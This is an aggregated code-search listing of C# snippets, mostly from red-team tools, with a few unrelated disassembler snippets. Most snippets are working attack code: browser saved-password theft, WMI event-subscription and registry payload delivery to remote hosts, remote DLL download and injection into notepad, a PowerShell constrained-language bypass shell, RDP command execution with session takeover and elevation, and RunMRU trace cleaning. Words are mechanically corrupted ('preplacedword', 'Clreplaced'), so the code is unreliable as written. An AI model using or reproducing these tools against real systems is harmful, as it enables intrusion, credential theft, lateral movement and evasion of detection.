                                preplacedword = DecryptWithKey(Encoding.Default.GetBytes(preplacedword), masterKey);
                            }
                            else
                                preplacedword = Decrypt(preplacedword); //Old versions using UnprotectData for decryption without any key
                        }
                        else
                            continue;

                        if (!string.IsNullOrEmpty(host) && !string.IsNullOrEmpty(username) && !string.IsNullOrEmpty(preplacedword))
                            data.Add(new Account() { URL = host, UserName = username, Preplacedword = preplacedword, Application = browser });
                    }
                    catch (Exception ex)
                    {
                        Console.WriteLine(ex.ToString());
                    }
                }
            }

            return data;
        }

19 Source : Program.cs
with BSD 3-Clause "New" or "Revised" License
from 0xthirteen

static void HowTo()
        {
            Console.WriteLine("CleanRunMRU");
            Console.WriteLine("  Query current RunMRU key");
            Console.WriteLine("    CleanRunMRU.exe query\n");
            Console.WriteLine("  Clear all the values");
            Console.WriteLine("    CleanRunMRU.exe clearall\n");
            Console.WriteLine("  Clear one specific value");
            Console.WriteLine("    CleanRunMRU.exe command=\"C:\\Windows\\System32\\cmd.exe\"\n");
        }

19 Source : Program.cs
with GNU General Public License v3.0
from 0xthirteen

static void WriteToFileWMI(string host, string eventName, string username, string preplacedword)
        {
            try
            {
                ConnectionOptions options = new ConnectionOptions();
                if (!String.IsNullOrEmpty(username))
                {
                    Console.WriteLine("[*] User credentials   : {0}", username);
                    options.Username = username;
                    options.Preplacedword = preplacedword;
                }
                Console.WriteLine();

                // first create a 5 second timer on the remote host
                ManagementScope timerScope = new ManagementScope(string.Format(@"\\{0}\root\cimv2", host), options);
                ManagementClreplaced timerClreplaced = new ManagementClreplaced(timerScope, new ManagementPath("__IntervalTimerInstruction"), null);
                ManagementObject myTimer = timerClreplaced.CreateInstance();
                myTimer["IntervalBetweenEvents"] = (UInt32)5000;
                myTimer["SkipIfPreplaceded"] = false;
                myTimer["TimerId"] = "Timer";
                try
                {
                    Console.WriteLine("[+] Creating Event Subscription {0}   : {1}", eventName, host);
                    myTimer.Put();
                }
                catch (Exception ex)
                {
                    Console.WriteLine("[X] Exception in creating timer object: {0}", ex.Message);
                    return;
                }

                ManagementScope scope = new ManagementScope(string.Format(@"\\{0}\root\subscription", host), options);

                // then install the __EventFilter for the timer object
                ManagementClreplaced wmiEventFilter = new ManagementClreplaced(scope, new ManagementPath("__EventFilter"), null);
                WqlEventQuery myEventQuery = new WqlEventQuery(@"SELECT * FROM __TimerEvent WHERE TimerID = 'Timer'");
                ManagementObject myEventFilter = wmiEventFilter.CreateInstance();
                myEventFilter["Name"] = eventName;
                myEventFilter["Query"] = myEventQuery.QueryString;
                myEventFilter["QueryLanguage"] = myEventQuery.QueryLanguage;
                myEventFilter["EventNameSpace"] = @"\root\cimv2";
                try
                {
                    myEventFilter.Put();
                }
                catch (Exception ex)
                {
                    Console.WriteLine("[X] Exception in setting event filter   : {0}", ex.Message);
                }


                // now create the ActiveScriptEventConsumer payload (VBS)
                ManagementObject myEventConsumer = new ManagementClreplaced(scope, new ManagementPath("ActiveScriptEventConsumer"), null).CreateInstance();

                myEventConsumer["Name"] = eventName;
                myEventConsumer["ScriptingEngine"] = "VBScript";
                myEventConsumer["ScriptText"] = vbsp;
                myEventConsumer["KillTimeout"] = (UInt32)45;

                try
                {
                    myEventConsumer.Put();
                }
                catch (Exception ex)
                {
                    Console.WriteLine("[X] Exception in setting event consumer: {0}", ex.Message);
                }


                // finally bind them together with a __FilterToConsumerBinding
                ManagementObject myBinder = new ManagementClreplaced(scope, new ManagementPath("__FilterToConsumerBinding"), null).CreateInstance();

                myBinder["Filter"] = myEventFilter.Path.RelativePath;
                myBinder["Consumer"] = myEventConsumer.Path.RelativePath;

                try
                {
                    myBinder.Put();
                }
                catch (Exception ex)
                {
                    Console.WriteLine("[X] Exception in setting FilterToConsumerBinding: {0}", ex.Message);
                }


                // wait for everything to trigger
                Console.WriteLine("\r\n[+] Waiting 10 seconds for event '{0}' to trigger\r\n", eventName);
                System.Threading.Thread.Sleep(10 * 1000);
                Console.WriteLine("[+] Done...cleaning up");
                // cleanup
                try
                {
                    myTimer.Delete();
                }
                catch (Exception ex)
                {
                    Console.WriteLine("[X] Exception in removing 'Timer' interval timer: {0}", ex.Message);
                }

                try
                {
                    myBinder.Delete();
                }
                catch (Exception ex)
                {
                    Console.WriteLine("[X] Exception in removing FilterToConsumerBinding: {0}", ex.Message);
                }

                try
                {
                    myEventFilter.Delete();
                }
                catch (Exception ex)
                {
                    Console.WriteLine("[X] Exception in removing event filter: {0}", ex.Message);
                }

                try
                {
                    myEventConsumer.Delete();
                }
                catch (Exception ex)
                {
                    Console.WriteLine("[X] Exception in removing event consumer: {0}", ex.Message);
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine(String.Format("[X] Exception : {0}", ex.Message));
            }
        }

19 Source : Program.cs
with GNU General Public License v3.0
from 0xthirteen

static void WriteToRegKey(string host, string username, string preplacedword, string keypath, string valuename)
        {
            if (!keypath.Contains(":"))
            {
                Console.WriteLine("[-] Please put ':' inbetween hive and path: HKCU:Location\\Of\\Key");
                return;
            }
            string[] reginfo = keypath.Split(':');
            string reghive = reginfo[0];
            string wmiNameSpace = "root\\CIMv2";
            UInt32 hive = 0;
            switch (reghive.ToUpper())
            {
                case "HKCR":
                    hive = 0x80000000;
                    break;
                case "HKCU":
                    hive = 0x80000001;
                    break;
                case "HKLM":
                    hive = 0x80000002;
                    break;
                case "HKU":
                    hive = 0x80000003;
                    break;
                case "HKCC":
                    hive = 0x80000005;
                    break;
                default:
                    Console.WriteLine("[X] Error     :  Could not get the right reg hive");
                    return;
            }
            ConnectionOptions options = new ConnectionOptions();
            Console.WriteLine("[+] Target             : {0}", host);
            if (!String.IsNullOrEmpty(username))
            {
                Console.WriteLine("[+] User               : {0}", username);
                options.Username = username;
                options.Preplacedword = preplacedword;
            }
            Console.WriteLine();
            ManagementScope scope = new ManagementScope(String.Format("\\\\{0}\\{1}", host, wmiNameSpace), options);
            try
            {
                scope.Connect();
                Console.WriteLine("[+] WMI connection established");
            }
            catch (Exception ex)
            {
                Console.WriteLine("[X] Failed to connect to to WMI    : {0}", ex.Message);
                return;
            }

            try
            {
                //Probably stay with string value only
                ManagementClreplaced registry = new ManagementClreplaced(scope, new ManagementPath("StdRegProv"), null);
                ManagementBaseObject inParams = registry.GetMethodParameters("SetStringValue");
                inParams["hDefKey"] = hive;
                inParams["sSubKeyName"] = reginfo[1];
                inParams["sValueName"] = valuename;
                inParams["sValue"] = datavals;
                ManagementBaseObject outParams = registry.InvokeMethod("SetStringValue", inParams, null);
                if(Convert.ToInt32(outParams["ReturnValue"]) == 0)
                {
                    Console.WriteLine("[+] Created {0} {1} and put content inside", keypath, valuename);
                }
                else
                {
                    Console.WriteLine("[-] An error occured, please check values");
                    return;
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine(String.Format("[X] Error      :  {0}", ex.Message));
                return;
            }
        }

19 Source : Program.cs
with GNU General Public License v3.0
from 0xthirteen

static void RemoveRegValue(string host, string username, string preplacedword, string keypath, string keyname)
        {
            if (!keypath.Contains(":"))
            {
                Console.WriteLine("[-] Please put ':' inbetween hive and path: HKCU:Location\\Of\\Key");
                return;
            }
            if (!String.IsNullOrEmpty(host))
            {
                host = "127.0.0.1";
            }
            string[] reginfo = keypath.Split(':');
            string reghive = reginfo[0];
            string wmiNameSpace = "root\\CIMv2";
            UInt32 hive = 0;
            switch (reghive.ToUpper())
            {
                case "HKCR":
                    hive = 0x80000000;
                    break;
                case "HKCU":
                    hive = 0x80000001;
                    break;
                case "HKLM":
                    hive = 0x80000002;
                    break;
                case "HKU":
                    hive = 0x80000003;
                    break;
                case "HKCC":
                    hive = 0x80000005;
                    break;
                default:
                    Console.WriteLine("[X] Error     :  Could not get the right reg hive");
                    return;
            }
            ConnectionOptions options = new ConnectionOptions();
            Console.WriteLine("[+] Target             : {0}", host);
            if (!String.IsNullOrEmpty(username))
            {
                Console.WriteLine("[+] User               : {0}", username);
                options.Username = username;
                options.Preplacedword = preplacedword;
            }
            Console.WriteLine();
            ManagementScope scope = new ManagementScope(String.Format("\\\\{0}\\{1}", host, wmiNameSpace), options);
            try
            {
                scope.Connect();
                Console.WriteLine("[+]  WMI connection established");
            }
            catch (Exception ex)
            {
                Console.WriteLine("[X] Failed to connecto to WMI    : {0}", ex.Message);
                return;
            }

            try
            {
                //Probably stay with string value only
                ManagementClreplaced registry = new ManagementClreplaced(scope, new ManagementPath("StdRegProv"), null);
                ManagementBaseObject inParams = registry.GetMethodParameters("DeleteValue");
                inParams["hDefKey"] = hive;
                inParams["sSubKeyName"] = keypath;
                inParams["sValueName"] = keyname;
                ManagementBaseObject outParams1 = registry.InvokeMethod("DeleteValue", inParams, null);
                Console.WriteLine("[+] Deleted value at {0} {1}", keypath, keyname);
            }
            catch (Exception ex)
            {
                Console.WriteLine(String.Format("[-] {0}", ex.Message));
                return;
            }
        }

19 Source : Program.cs
with GNU General Public License v3.0
from 0xthirteen

static void Main(string[] args)
        {
            if (args.Length < 2)
            {
                Usage();
                return;
            }

            var arguments = new Dictionary<string, string>();
            foreach (string argument in args)
            {
                int idx = argument.IndexOf('=');
                if (idx > 0)
                    arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1);
            }

            string username = "";
            string preplacedword = "";

            if (arguments.ContainsKey("username"))
            {
                if (!arguments.ContainsKey("preplacedword"))
                {
                    Usage();
                    return;
                }
                else
                {
                    username = arguments["username"];
                    preplacedword = arguments["preplacedword"];
                }
            }
            if (arguments.ContainsKey("preplacedword") && !arguments.ContainsKey("username"))
            {
                Usage();
                return;
            }
            if (arguments.ContainsKey("computername"))
            {
                string[] computerNames = arguments["computername"].Split(',');
                string eventName = "Debug";
                string location = "local";
                string droplocation = @"C:\Windows\Temp";
                string wnamespace = "root\\CIMv2";
                string filename = string.Empty;
                string valuename = string.Empty;
                string keypath = string.Empty;
                string clreplacedname = string.Empty;
                foreach (string computerName in computerNames)
                {
                    if (arguments.ContainsKey("eventname"))
                    {
                        eventName = arguments["eventname"];
                    }
                    if (arguments.ContainsKey("location"))
                    {
                        location = arguments["location"];
                    }
                    if (arguments.ContainsKey("droplocation"))
                    {
                        droplocation = arguments["droplocation"];
                    }
                    if (arguments.ContainsKey("filename"))
                    {
                        filename = arguments["filename"];
                    }
                    if (arguments.ContainsKey("clreplacedname"))
                    {
                        clreplacedname = arguments["clreplacedname"];
                    }
                    if (arguments.ContainsKey("keypath"))
                    {
                        keypath = arguments["keypath"];
                    }
                    if (arguments.ContainsKey("valuename"))
                    {
                        valuename = arguments["valuename"];
                    }
                    if (arguments.ContainsKey("wminamespace"))
                    {
                        wnamespace = arguments["wminamespace"];
                    }

                    if (arguments.ContainsKey("writetype"))
                    {
                        if (arguments["writetype"].ToLower() == "wmi")
                        {
                            GetFileContent(location, droplocation, filename, "flat");
                            WriteToFileWMI(computerName, eventName, username, preplacedword);
                        }
                        else if (arguments["writetype"].ToLower() == "smb")
                        {
                            WriteToFileSMB(computerName, droplocation, filename, location);
                        }
                        else if(arguments["writetype"].ToLower() == "registry")
                        {
                            if (valuename == string.Empty)
                            {
                                Console.WriteLine("[-] Valuename is required");
                                return;
                            }
                            GetFileContent(location, droplocation, filename, "nonflat");
                            WriteToRegKey(computerName, username, preplacedword, keypath, valuename);
                        }
                        else if (arguments["writetype"].ToLower() == "wmiclreplaced")
                        {
                            GetFileContent(location, droplocation, filename, "nonflat");
                            WriteToWMIClreplaced(computerName, username, preplacedword, wnamespace, clreplacedname);
                        }
                        else if (arguments["writetype"].ToLower() == "removewmiclreplaced")
                        {
                            RemoveWMIClreplaced(computerName, username, preplacedword, wnamespace, clreplacedname);
                        }
                        else if (arguments["writetype"].ToLower() == "removeregkey")
                        {
                            RemoveRegValue(computerName, username, preplacedword, keypath, valuename);
                        }
                        else
                        {
                            Usage();
                            return;
                        }
                    }
                    else
                    {
                        Usage();
                    }
                }
            }
            else
            {
                Usage();
                return;
            }
        }

19 Source : ExcelDCOM.cs
with GNU General Public License v3.0
from 0xthirteen

static void Main(string[] args)
        {
            var arguments = new Dictionary<string, string>();
            foreach (string argument in args)
            {
                int idx = argument.IndexOf('=');
                if (idx > 0)
                    arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1);
            }

            if(!arguments.ContainsKey("computername"))
            {
                Console.WriteLine("[-] Error: computername arg is required");
                return;
            }
            else
            {
                string arch = "x86";
                string target = arguments["computername"];
                if (arguments.ContainsKey("arch"))
                {
                    if(arguments["arch"].ToLower() == "x64" || arguments["arch"] == "64")
                    {
                        arch = "x64";
                    }
                }
                ExecExcelDCOM(target, arch);
            }
        }

19 Source : Program.cs
with MIT License
from 0xd4d

static int Main(string[] args) {
			try {
				switch (System.Runtime.InteropServices.RuntimeInformation.ProcessArchitecture) {
				case System.Runtime.InteropServices.Architecture.X64:
				case System.Runtime.InteropServices.Architecture.X86:
					break;
				default:
					throw new ApplicationException($"Unsupported CPU arch: {System.Runtime.InteropServices.RuntimeInformation.ProcessArchitecture}");
				}

				var jitDasmOptions = CommandLineParser.Parse(args);
				if (!string2.IsNullOrEmpty(jitDasmOptions.LoadModule)) {
#if DEBUG
					Console.Error.WriteLine($"Trying to jit methods in module '{jitDasmOptions.LoadModule}' but JitDasm is a debug build, not a release build!");
#endif
					MethodJitter.JitMethods(jitDasmOptions.LoadModule, jitDasmOptions.TypeFilter, jitDasmOptions.MethodFilter, jitDasmOptions.RunClreplacedConstructors, jitDasmOptions.replacedemblySearchPaths);
				}
				var (bitness, methods, knownSymbols) = GetMethodsToDisreplacedemble(jitDasmOptions.Pid, jitDasmOptions.ModuleName, jitDasmOptions.TypeFilter, jitDasmOptions.MethodFilter, jitDasmOptions.HeapSearch);
				var jobs = GetJobs(methods, jitDasmOptions.OutputDir, jitDasmOptions.FileOutputKind, jitDasmOptions.FilenameFormat, out var baseDir);
				if (!string2.IsNullOrEmpty(baseDir))
					Directory.CreateDirectory(baseDir);
				var sourceDoreplacedentProvider = new SourceDoreplacedentProvider();
				using (var mdProvider = new MetadataProvider()) {
					var sourceCodeProvider = new SourceCodeProvider(mdProvider, sourceDoreplacedentProvider);
					using (var context = new DisasmJobContext(bitness, knownSymbols, sourceCodeProvider, jitDasmOptions.DisreplacedemblerOutputKind, jitDasmOptions.Diffable, jitDasmOptions.ShowAddresses, jitDasmOptions.ShowHexBytes, jitDasmOptions.ShowSourceCode)) {
						foreach (var job in jobs)
							Disreplacedemble(context, job);
					}
				}
				return 0;
			}
			catch (ShowCommandLineHelpException) {
				CommandLineParser.ShowHelp();
				return 1;
			}
			catch (CommandLineParserException ex) {
				Console.WriteLine(ex.Message);
				return 1;
			}
			catch (ApplicationException ex) {
				Console.WriteLine(ex.Message);
				return 1;
			}
			catch (ClrDiagnosticsException ex) {
				Console.WriteLine(ex.Message);
				Console.WriteLine("Make sure this process has the same bitness as the target process");
				return 1;
			}
			catch (Exception ex) {
				Console.WriteLine(ex.ToString());
				return 1;
			}
		}

19 Source : Program.cs
with MIT License
from 0xDivyanshu

static int reflective_dll_injection(string location)
        {
            Process[] remote_p = Process.GetProcessesByName("notepad");
            int pid = 0;

            if (remote_p.Length == 0)
            {
                //Create Process
                Process p = new Process();
                p.StartInfo.FileName = "C:\\Windows\\System32\\notepad.exe";
                p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
                p.Start();
                pid = p.Id;
            }
            else
            {
                pid = remote_p[0].Id;
            }

            String dllName = "";

            if (location.StartsWith("http"))
            {
                WebClient wc = new WebClient();
                wc.DownloadFile(location, "C:\\Windows\\Temp\\meet.dll");
                dllName = "C:\\Windows\\Temp\\meet.dll";
            }
            else
            {
                dllName = location;
            }

            IntPtr hProcess = OpenProcess(PROCESS_ALL_ACCESS, false, pid);
            IntPtr address = VirtualAllocEx(hProcess, IntPtr.Zero, 0x1000, 0x3000, 0x40);
            IntPtr bytes = IntPtr.Zero;
            bool res = WriteProcessMemory(hProcess, address, Encoding.Default.GetBytes(dllName), dllName.Length, out bytes);
            if (res == false)
            {
                Console.WriteLine("Cannot copy into process");
                return -1;
            }
            IntPtr load_addr = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
            CreateRemoteThread(hProcess, IntPtr.Zero, 0, load_addr, address, 0, IntPtr.Zero);

            return 0;
        }

19 Source : Program.cs
with MIT License
from 0xDivyanshu

static void powershell_clm(String file_tmp)
        {
            Console.WriteLine("[+] Powershell CLM bypreplaced!\n");
            Runspace rs = RunspaceFactory.CreateRunspace();
            String op_file = file_tmp;
            PowerShell ps = PowerShell.Create();
            while (true)
            {
                Console.Write("PS:>");
                string input = Console.ReadLine();
                if (input == "exit")
                {
                    break;
                }
                ps.AddScript(input + " | Out-File -FilePath " + op_file);
                ps.Invoke();
                string output = File.ReadAllText(op_file);
                Console.WriteLine(output);
                File.Delete(op_file);
            }
            rs.Close();
        }

19 Source : Program.cs
with BSD 3-Clause "New" or "Revised" License
from 0xthirteen

static void CleanSingle(string command)
        {
            string keypath = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU";
            string keyvalue = string.Empty;
            string regcmd = string.Empty;
            if (command.EndsWith("\\1"))
            {
                regcmd = command;
            }
            else
            {
                regcmd = string.Format("{0}\\1", command);
            }
             
            try
            {
                RegistryKey regkey;
                regkey = Registry.CurrentUser.OpenSubKey(keypath, true);

                if (regkey.ValueCount > 0)
                {
                    foreach (string subKey in regkey.GetValueNames())
                    {
                        if(regkey.GetValue(subKey).ToString() == regcmd)
                        {
                            keyvalue = subKey;
                            regkey.DeleteValue(subKey);
                            Console.WriteLine(regcmd);
                            Console.WriteLine("[+] Cleaned {0} from HKCU:{1}", command, keypath);
                        }
                    }
                    if(keyvalue != string.Empty)
                    {
                        string mruchars = regkey.GetValue("MRUList").ToString();
                        int index = mruchars.IndexOf(keyvalue);
                        mruchars = mruchars.Remove(index, 1);
                        regkey.SetValue("MRUList", mruchars);
                    }
                }
                regkey.Close();
            }
            catch (ArgumentException)
            {
                Console.WriteLine("[-] Error: Selected Registry value does not exist");
            }
        }

19 Source : Program.cs
with GNU General Public License v3.0
from 0xthirteen

static void WriteToWMIClreplaced(string host, string username, string preplacedword, string wnamespace, string clreplacedname)
        {
            ConnectionOptions options = new ConnectionOptions();
            Console.WriteLine("[+] Target             : {0}", host);
            if (!String.IsNullOrEmpty(username))
            {
                Console.WriteLine("[+] User               : {0}", username);
                options.Username = username;
                options.Preplacedword = preplacedword;
            }
            Console.WriteLine();
            ManagementScope scope = new ManagementScope(String.Format("\\\\{0}\\{1}", host, wnamespace), options);
            try
            {
                scope.Connect();
                Console.WriteLine("[+] WMI connection established");
            }
            catch (Exception ex)
            {
                Console.WriteLine("[X] Failed to connecto to WMI    : {0}", ex.Message);
                return;
            }
            try
            {
                var nclreplaced = new ManagementClreplaced(scope, new ManagementPath(string.Empty), new ObjectGetOptions());
                nclreplaced["__CLreplaced"] = clreplacedname;
                nclreplaced.Qualifiers.Add("Static", true);
                nclreplaced.Properties.Add("WinVal", CimType.String, false);
                nclreplaced.Properties["WinVal"].Qualifiers.Add("read", true);
                nclreplaced["WinVal"] = datavals;
                //nclreplaced.Properties.Add("Sizeof", CimType.String, false);
                //nclreplaced.Properties["Sizeof"].Qualifiers.Add("read", true);
                //nclreplaced.Properties["Sizeof"].Qualifiers.Add("Description", "Value needed for Windows");
                nclreplaced.Put();

                Console.WriteLine("[+] Create WMI Clreplaced     :   {0} {1}", wnamespace, clreplacedname);
            }
            catch (Exception ex)
            {
                Console.WriteLine(String.Format("[X] Error     :  {0}", ex.Message));
                return;
            }
        }

19 Source : Program.cs
with GNU General Public License v3.0
from 0xthirteen

static void RemoveWMIClreplaced(string host, string username, string preplacedword, string wnamespace, string clreplacedname)
        {
            if (!String.IsNullOrEmpty(wnamespace))
            {
                wnamespace = "root\\CIMv2";
            }
            if (!String.IsNullOrEmpty(host))
            {
                host = "127.0.0.1";
            }
            ConnectionOptions options = new ConnectionOptions();
            Console.WriteLine("[+] Target             : {0}", host);
            if (!String.IsNullOrEmpty(username))
            {
                Console.WriteLine("[+] User               : {0}", username);
                options.Username = username;
                options.Preplacedword = preplacedword;
            }
            Console.WriteLine();
            ManagementScope scope = new ManagementScope(String.Format("\\\\{0}\\{1}", host, wnamespace), options);
            try
            {
                scope.Connect();
                Console.WriteLine("[+]  WMI connection established");
            }
            catch (Exception ex)
            {
                Console.WriteLine("[X] Failed to connecto to WMI    : {0}", ex.Message);
                return;
            }
            try
            {
                var rmclreplaced = new ManagementClreplaced(scope, new ManagementPath(clreplacedname), new ObjectGetOptions());
                rmclreplaced.Delete();
            }
            catch (Exception ex)
            {
                Console.WriteLine(String.Format("[-] {0}", ex.Message));
                return;
            }
        }

19 Source : Program.cs
with GNU General Public License v3.0
from 0xthirteen

static void GetFileContent(string paylocation, string droploc, string fname, string dtype)
        {
            bool uricheck = Uri.IsWellFormedUriString(paylocation, UriKind.RelativeOrAbsolute);
            if (paylocation == "local")
            {
                String plfile = "LOADLOADLOAD";
                if(dtype == "flat")
                {
                    String finalpay = String.Format("Dim pLoad, fnames, droploc\npLoad =\"{0}\"\nfnames = \"{1}\"\ndroploc = \"{2}\"\n", plfile, fname, droploc);
                    vbsp = vbsp.Insert(0, finalpay);
                }
                else if (dtype == "nonflat")
                {
                    datavals = plfile;
                }
            }
            else
            {
                if (uricheck)
                {
                    try
                    {
                        WebClient webcl = new WebClient();
                        //May want to change this
                        webcl.Headers.Add("user-agent", "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko");
                        byte[] filedata = webcl.DownloadData(paylocation);
                        string plfile = Convert.ToBase64String(filedata);
                        if (dtype == "flat")
                        {
                            String finalpay = String.Format("Dim pLoad, fnames, droploc\npLoad =\"{0}\"\nfnames = \"{1}\"\ndroploc = \"{2}\"\n", plfile, fname, droploc);
                            vbsp = vbsp.Insert(0, finalpay);
                        }
                        else if (dtype == "nonflat")
                        {
                            datavals = plfile;
                        }
                    }
                    catch (WebException)
                    {
                        Console.WriteLine("[X] URL doesnt exist");
                        return;
                    }
                }
                else
                {
                    try
                    {
                        Byte[] plbytes = File.ReadAllBytes(paylocation);
                        String plfile = Convert.ToBase64String(plbytes);
                        if(dtype == "flat")
                        {
                            String finalpay = String.Format("Dim pLoad, fnames, droploc\npLoad =\"{0}\"\nfnames = \"{1}\"\ndroploc = \"{2}\"\n", plfile, fname, droploc);
                            vbsp = vbsp.Insert(0, finalpay);
                        }
                        else if (dtype == "nonflat")
                        {
                            datavals = plfile;
                        }
                    }
                    catch (IOException)
                    {
                        Console.WriteLine("[X] File doesnt exist");
                        return;
                    }
                }
            }
        }

19 Source : Program.cs
with GNU General Public License v3.0
from 0xthirteen

static void Usage()
        {
            Console.WriteLine("\n  Write Files");
            Console.WriteLine("");
            Console.WriteLine("   FileWrite.exe computername=host.domain.local writetype=wmi eventname=TestTask location=local droplocation=\"C:\\Windows\\Temp\" filename=move.exe");
            Console.WriteLine("   FileWrite.exe computername=host.domain.local writetype=smb droplocation=\"C:\\Windows\\Temp\" filename=move.exe");

        }

19 Source : Client.cs
with BSD 3-Clause "New" or "Revised" License
from 0xthirteen

private void RdpConnectionOnOnLogonError(object sender, IMsTscAxEvents_OnLogonErrorEvent e)
        {
            LogonErrorCode = e.lError;
            var errorstatus = Enum.GetName(typeof(LogonErrors), (uint)LogonErrorCode);
            Console.WriteLine("[-] Logon Error           :  {0} - {1}", LogonErrorCode, errorstatus);
            Thread.Sleep(1000);

            if(LogonErrorCode == -5 && takeover == true)
            {
                // it doesn't go to the logon event, so this has to be done here
                var rdpSession = (AxMsRdpClient9NotSafeForScripting)sender;
                Thread.Sleep(1000);
                keydata = (IMsRdpClientNonScriptable)rdpSession.GetOcx();
                Console.WriteLine("[+] Another user is logged on, asking to take over session");
                SendElement("Tab");
                Thread.Sleep(500);
                SendElement("Enter+down");
                Thread.Sleep(500);
                SendElement("Enter+up");
                Thread.Sleep(500);
                Console.WriteLine("[+] Sleeping for 30 seconds");
                Task.Delay(31000).GetAwaiter().GetResult();
                Marshal.ReleaseComObject(rdpSession);
                Marshal.ReleaseComObject(keydata);
            }
            else if (LogonErrorCode != -2)
            {
                Environment.Exit(0);
            }
        }

19 Source : Program.cs
with BSD 3-Clause "New" or "Revised" License
from 0xthirteen

static void HowTo()
        {
            Console.WriteLine("SharpRDP");
            Console.WriteLine("");
            Console.WriteLine("  Regular RDP Connection");
            Console.WriteLine("    SharpRDP.exe computername=domain.target command=\"C:\\Temp\\file.exe\" username=domain\\user preplacedword=preplacedword");
            Console.WriteLine("  Exec as child process of cmd or ps ");
            Console.WriteLine("    SharpRDP.exe computername=domain.target command=\"C:\\Temp\\file.exe\" username=domain\\user preplacedword=preplacedword exec=cmd");
            Console.WriteLine("  Use restricted admin mode");
            Console.WriteLine("    SharpRDP.exe computername=domain.target command=\"C:\\Temp\\file.exe\"");
            Console.WriteLine("  Connect first host drives");
            Console.WriteLine("    SharpRDP.exe computername=domain.target command=\"\\\\tsclient\\C\\Temp\\file.exe\" username=domain\\user preplacedword=preplacedword connectdrive=true");
            Console.WriteLine("  Ask to take over RDP session if another used is logged in (workstation)");
            Console.WriteLine("    SharpRDP.exe computername=domain.target command=\"C:\\Temp\\file.exe\" username=domain\\user preplacedword=preplacedword takeover=true");
            Console.WriteLine("  Network level authentication");
            Console.WriteLine("    SharpRDP.exe computername=domain.target command=\"C:\\Temp\\file.exe\" username=domain\\user preplacedword=preplacedword nla=true");
            Console.WriteLine("  Execute command elevated through Run Dialog");
            Console.WriteLine("    SharpRDP.exe computername=domain.target command=\"C:\\Temp\\file.exe\" username=domain\\user preplacedword=preplacedword elevated=winr");
            Console.WriteLine("  Execute command elevated through task manager");
            Console.WriteLine("    SharpRDP.exe computername=domain.target command=\"C:\\Temp\\file.exe\" username=domain\\user preplacedword=preplacedword elevated=taskmgr");
        }

19 Source : Program.cs
with BSD 3-Clause "New" or "Revised" License
from 0xthirteen

static void Main(string[] args)
        {
            AppDomain.CurrentDomain.replacedemblyResolve += (sender, argtwo) => {
                replacedembly thisreplacedembly = replacedembly.GetEntryreplacedembly();
                String resourceName = string.Format("SharpRDP.{0}.dll.bin",
                    new replacedemblyName(argtwo.Name).Name);
                var replacedembly = replacedembly.GetExecutingreplacedembly();
                using (var rs = replacedembly.GetManifestResourceStream(resourceName))
                using (var zs = new DeflateStream(rs, CompressionMode.Decompress))
                using (var ms = new MemoryStream())
                {
                    zs.CopyTo(ms);
                    return replacedembly.Load(ms.ToArray());
                }
            };

            var arguments = new Dictionary<string, string>();
            foreach (string argument in args)
            {
                int idx = argument.IndexOf('=');
                if (idx > 0)
                    arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1);
            }

            string username = string.Empty;
            string domain = string.Empty;
            string preplacedword = string.Empty;
            string command = string.Empty;
            string execElevated = string.Empty;
            string execw = "";
            bool connectdrive = false;
            bool takeover = false;
            bool nla = false;
            
            if (arguments.ContainsKey("username"))
            {
                if (!arguments.ContainsKey("preplacedword"))
                {
                    Console.WriteLine("[X] Error: A preplacedword is required");
                    return;
                }
                else
                {
                    if (arguments["username"].Contains("\\"))
                    {
                        string[] tmp = arguments["username"].Split('\\');
                        domain = tmp[0];
                        username = tmp[1];
                    }
                    else
                    {
                        domain = ".";
                        username = arguments["username"];
                    }
                    preplacedword = arguments["preplacedword"];
                }
            }

            if (arguments.ContainsKey("preplacedword") && !arguments.ContainsKey("username"))
            {
                Console.WriteLine("[X] Error: A username is required");
                return;
            }
            if ((arguments.ContainsKey("computername")) && (arguments.ContainsKey("command")))
            {
                Client rdpconn = new Client();
                command = arguments["command"];
                if (arguments.ContainsKey("exec"))
                {
                    if (arguments["exec"].ToLower() == "cmd")
                    {
                        execw = "cmd";
                    }
                    else if (arguments["exec"].ToLower() == "powershell" || arguments["exec"].ToLower() == "ps")
                    {
                        execw = "powershell";
                    }
                }
                if (arguments.ContainsKey("elevated"))
                {
                    if(arguments["elevated"].ToLower() == "true" || arguments["elevated"].ToLower() == "win+r" || arguments["elevated"].ToLower() == "winr")
                    {
                        execElevated = "winr";
                    }
                    else if(arguments["elevated"].ToLower() == "taskmgr" || arguments["elevated"].ToLower() == "taskmanager")
                    {
                        execElevated = "taskmgr";
                    }
                    else
                    {
                        execElevated = string.Empty;
                    }
                }
                if (arguments.ContainsKey("connectdrive"))
                {
                    if(arguments["connectdrive"].ToLower() == "true")
                    {
                        connectdrive = true;
                    }
                }
                if (arguments.ContainsKey("takeover"))
                {
                    if (arguments["takeover"].ToLower() == "true")
                    {
                        takeover = true;
                    }
                }
                if (arguments.ContainsKey("nla"))
                {
                    if (arguments["nla"].ToLower() == "true")
                    {
                        nla = true;
                    }
                }
                string[] computerNames = arguments["computername"].Split(',');
                foreach (string server in computerNames)
                {
                    rdpconn.CreateRdpConnection(server, username, domain, preplacedword, command, execw, execElevated, connectdrive, takeover, nla);
                }
            }
            else
            {
                HowTo();
                return;
            }

        }

19 Source : MethodJitter.cs
with MIT License
from 0xd4d

static IEnumerable<Type> GetTypes(replacedembly asm) {
			Type?[] allTypes;
			try {
				allTypes = asm.GetTypes();
			}
			catch (ReflectionTypeLoadException ex) {
				allTypes = ex.Types ?? Array.Empty<Type>();
				Console.WriteLine("Failed to load one or more types");
			}
			bool ignoredTypeMessage = false;
			foreach (var type in allTypes) {
				if (!(type is null)) {
					if (type.IsGenericTypeDefinition) {
						if (!ignoredTypeMessage) {
							ignoredTypeMessage = true;
							Console.WriteLine("Ignoring all generic types");
						}
						continue;
					}
					yield return type;
				}
			}
		}

19 Source : MethodJitter.cs
with MIT License
from 0xd4d

replacedembly? Resolvereplacedembly(string? name) {
			if (name is null)
				return null;
			if (nameToreplacedembly.TryGetValue(name, out var asm))
				return asm;
			nameToreplacedembly.Add(name, null);

